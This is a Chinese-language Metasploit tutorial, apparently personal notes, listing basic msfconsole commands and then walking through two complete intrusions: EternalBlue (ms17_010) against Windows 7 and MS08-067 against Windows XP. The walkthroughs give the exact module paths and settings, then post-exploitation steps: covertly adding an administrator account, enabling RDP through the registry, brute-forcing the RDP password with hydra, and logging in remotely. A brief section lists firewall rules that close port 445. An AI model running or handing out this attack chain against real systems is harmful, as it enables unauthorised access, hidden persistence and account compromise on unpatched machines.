一些常用指令
msfconsole 打开控制台终端
msfupdate 更新
help [command] e.g. help search 命令使用帮助信息
search […] e.g. search portscan
use … 选择渗透攻击模块
show payloads 查看与该攻击模块相兼容的攻击载荷
set payload … 设置攻击载荷
set target 设置目标
show options 查看需要设置的配置参数
exploit 实施渗透攻击
metasploit渗透攻击模块在目录/usr/share/metasploit-framework/modules/exploits
nmap <扫描选项><扫描目标>
攻击实例
1、利用永恒之蓝(ms17_010)漏洞攻击win7
- 打开metasploit
msfconsole - 使用永恒之蓝模块
search ms17-01
use exploit/windows/smb/ms17_010_eternalblue - 填充各种指令,主要是靶机IP,其中445端口已经默认了,其他不用改
show options
set RHOST 192.168.12.1 - 攻击
exploit或者run - 创建新用户,偷偷的控制使用
net user admin 123456 /add - 提权,将新创建的用户admin提到管理员权限
net localgroup administrators admin /add
查看权限:
net user admin
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”
2、利用Windows Server服务RPC请求缓冲区溢出漏洞(ms_08067)入侵WinXP
- 在msfconsole使用search命令搜索MS08067漏洞攻击程序
- 使用use命令调用MS08067漏洞攻击程序
use exploit/windows/smb/ms08_067_netapi - 使用show options 命令查看需要设置的选项
可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)
使用 set 命令设置 Module Options,此处需要设置目标IP - 接着设置Exploit target,使用show targets 查看可选项
可以看出哪些版本的系统存在此漏洞,攻击的XP系统为WinXP SP3 简体中文版,即使用set target 命令设置目标,此处即为set target 34 - 此时再用show options 可以看到全部设置完成,接着使用exploit 或者 run 进行攻击,执行exploit命令后得到一个meterpreter
- 在meterpreter中输入shell即可进入CMD窗口
- 可以进行一些攻击,如远程桌面控制:
—-打开RDP服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
—-使用netstat -an命令查看端口是否开放
—-接着使用net user命令查看XP系统中的用户
net user
—-然后针对指定用户比如sysorem用户进行登录密码爆破
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
—-使用hydra爆破密码得:12345接着就能直接登录XP进行远程控制
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
—-完成远程控制